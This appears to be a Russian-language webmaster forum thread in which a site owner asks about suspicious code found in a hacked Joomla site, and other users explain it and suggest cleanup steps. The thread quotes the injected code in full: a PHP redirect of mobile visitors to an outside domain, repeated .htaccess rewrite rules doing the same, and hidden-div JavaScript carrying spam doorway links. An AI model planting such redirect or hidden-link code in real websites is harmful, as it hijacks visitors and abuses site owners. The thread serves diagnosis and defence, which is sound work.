Что за код в <HTML> ?

Ребята, подскажите что за код (подозрительно мне кажется) в самом начале страницы до тэга <HTML> нашел на сайте нашем.

Code:

<?php
if(preg_match('!MIDP|WAP|Windows.CE|PPC|Series60|Opera.Mini|Mobile|Symbian|Android!i', 
$_SERVER['HTTP_USER_AGENT']) || 
!preg_match('!windows.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|ipad|iphone|libwww|msn|fdm|maui|webmoney!i',$_SERVER['HTTP_USER_AGENT']))
     {
         header('location: http://qwdqwd.tk/r.php';);
         exit;
     }
?>
<?php
defined( '_JEXEC' ) or die( 'Restricted access' );

?>

------------Код на внутренней странице----

<?php
if(preg_match('!MIDP|WAP|Windows.CE|PPC|Series60|Opera.Mini|Mobile|Symbian|Android!i', 
$_SERVER['HTTP_USER_AGENT']) || 
!preg_match('!windows.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|ipad|iphone|libwww|msn|fdm|maui|webmoney!i',$_SERVER['HTTP_USER_AGENT']))
     {
         header('location: http://qwdqwd.tk/r.php';);
         exit;
     }
?>
<?php
defined( '_JEXEC' ) or die( 'Restricted access' );
$document = & JFactory::getDocument();
$config = & JFactory::getConfig();
$fulltitle = $config->getValue('sitename').' - '.$document->title;
$document->setTitle( $fulltitle );
$option = JRequest::getVar('option', null);
?>

интересует 2 вопроса:

1. что этот скрип делает?
2. если это взлом, то этим ограничется, или в сайте еще будут т.п. скрипты?

 

Трафик ворует на http://qwdqwd.tk/r.php

 

т.е. ?
редирект стоит на http://qwdqwd.tk ?
если кажем арскручиваю свой сайт, то все результаты получает http://qwdqwd.tk ?

как можно вычислять что за сайт и кто за ними стоит? просто хочу понять конкуренты (целенаправлено взломан) или попал под общую дуло?

 

Если бы тебя заказали конкуренты они бы не ставили за цель на твоём трафике разжиться. А если бы и ставили - url был другой. Явно ты используешь уязвимый движ - либо какимто образом умудрился протерять админские пароли.
Ситуация весьма распространённая. Какой движок используешь?

 

Joomla, не?

 

Движек - джумла. сайт сделали по закажу (3 месяца назад где то)
а этот скрипне знаю с каких пор так, а узнал случайно, когда клиент сказал, что не может с смартфона зайти, (платформа ANDROID) пишет,что сайт ненадежный (или что тотипа такого). вот тогда и подозревал, что на сайте что то не то. сначало проверил на всяких ресурсах на наличие вируса на сайте, но везде поакзал,ч то вирусов нет, но когда смотрел исходный год, то этот скрип уже бросился на глаза..

 

Редиректит траф, который идёт с мобильников...

 

понятно, что это взлом. остался выяснить - это уязвимость движка?

 

Права на файл 777 ?

 

Дело в шаблоне, по логике вещей...
По ссылке переходили?
Уберите права на запись...

 

ок. спасибо.. в сервого раза не саметил, что там ответ на решение )) думал просто ситуация как у меня - не знает в чем дела.

Убрать на запись и все ? надо еще что то предпринимать ?

 

удалить реф

 

это где смотреть/как найти?

 

По всей видимости имелось ввиду удалить вредоносную часть кода. и пронаблюдать в дальнейшем за трафиком сайта.

 

а каким образом это грамотно делать ?
как бы я в ИБ не ламер, но вот WEB безопасность не дается мне

 

Ребята, а с какого файла надо убрать права на запись ?
на это? templates/shablon/index.php

 

Да по факту смело можешь со всех снимать. Права 777 в редких случаях нужны только при установке движка.

 

После переделки когда в индексном странице - проблема осталась...
икали , искали и нашли еще что то из этого котегории в файле .htaccess

Code:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://servtds.ru/l.php?l=o&r=1117&a=13 [L,R=302]
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://servtds.ru/l.php?l=o&r=1117&a=13 [L,R=302]
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://servtds.ru/l.php?l=o&r=1117&a=13 [L,R=302]

И в этом же папке был файл: htaccess.zip
удалили и файл и этот код..

Но хотел бы узнать:
1. этот код тоже самое делает, что и первый ? (перенаправяет трафик)
2. стоит еще искать части вредоносных кодов ?

 

ребята, появился новый код:

Code:

script type="text/javascript">
document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1997px; t' + 'op' + ': -2999px;">');
</script>
        <a href="http://НАШ.ru/logs/index.html">телефонная и адресная база спб</a>
        <a href="http://НАШ.ru/logs/Murmansk/index.html">online телефонная база</a>
        <a href="http://НАШ.ru/logs/Sarapul/index.html">перехват смс sms</a>
        <a href="http://НАШ.ru/logs/Barnaul/index.html">справочник телефонов красногорск</a>
        <a href="http://НАШ.ru/logs/Pervouralsk/index.html">определить местонахождение по номеру телефону</a>
        <a href="http://НАШ.ru/logs/Petropavlovsk/index.html">скачать телефонный справочник 2011 челябинска</a>
        <a href="http://НАШ.ru/logs/Arzamas/index.html">программа как определить местонахождение телефона</a>
        <a href="http://НАШ.ru/logs/Tomsk/index.html">справочник телефонов энергодара</a>
        <a href="http://НАШ.ru/logs/Volgodonsk/index.html">узнать номер телефона по адресу и фамилии</a>
        <a href="http://НАШ.ru/logs/Kursk/index.html">телефонная база данных московской области</a>
        <a href="http://НАШ.ru/logs/Orel/index.html">найти номер телефона новосибирск</a>
        <a href="http://НАШ.ru/logs/CHerepovec/index.html">телефонная база мгтс online</a>
        <a href="http://НАШ.ru/logs/Novorossiisk/index.html">справочник телефонов киев</a>
        <a href="http://НАШ.ru/logs/Penza/index.html">телефонная база сургута</a>
        <a href="http://НАШ.ru/logs/Peterburg/index.html">программа пеленгатор телефона</a>
        <a href="http://НАШ.ru/logs/Korolev/index.html">телефонный справочник павлодар 2011</a>
        <a href="http://НАШ.ru/logs/ZHeleznodorozhnyi/index.html">телефонная база сосновый бор</a>
        <a href="http://НАШ.ru/logs/Novgorod/index.html">справочник адресов и телефонов набережных челнов</a>
        <a href="http://НАШ.ru/logs/Sergiev/index.html">справочник телефонов асбест</a>
        <a href="http://НАШ.ru/logs/Syzran/index.html">телефонная база свердловской области</a>
        <a href="http://НАШ.ru/logs/Kopeisk/index.html">справочник телефонов нижнего</a>
        <a href="http://НАШ.ru/logs/sitemap.xml">sitemap</a>
        <a href="http://НАШ_другой.ru/includes/index.html">телефонная база прописки</a>
        <a href="http://heatrises.org/wp-content/index.html">скачать комментарий к ук рб</a>
        <a href="http://demo1.kubaweb.ru/logs/index.html">скачать microsoft office system 2003</a>
        <a href="http://ognestroi.ru/includes/index.html">гомель справочник телефонов</a>
        <a href="http://9770165.ru/includes/index.html">справочник телефонов минска</a>
        <a href="http://24crm.ru/includes/index.html">мобильный справочник санкт петербурга</a>
        <a href="http://fotovideonik.com/logs/index.html">местоположение через спутник</a>
        <a href="http://altaiskiymed.ru/logs/index.html">скачать flash player 10 0</a>
        <a href="http://israelrest.com/includes/index.html">справочник телефонов горно алтайска</a>
        <a href="http://bcshina.com/logs/index.html">телефонная база 2011 скачать бесплатно</a>
        <a href="http://www.bkt.lviv.ua/includes/index.html">определить местоположение абонента по номеру</a>
        <a href="http://shop.bkt.lviv.ua/img/index.html">защита от перехвата смс</a>
        <a href="http://33secundy.com.ua/includes/index.html">скачать игру квест полная версия я ищу</a>
        <a href="http://www.ooounistroy.ru/includes/index.html">поиск местонахождения по номеру мобильного телефона</a>
        <a href="http://evacopark.ru/data/index.html">скачать драйвер для видеокарты nvidia geforce 5600</a>

<script type="text/javascript">document.write('</d' + 'iv>');</script>

Опять взломали? и что за код вообще ? какой толк от него>?


По адресу http://НАШ.ru/logs/Syzran/index.html - откываются левые сайты...

 

взломали, начали пиарить свои доры на твоём сайте
http://yandex.ru/yandsearch?clid=9582&text=logs/Murmansk/index.html не ты один такой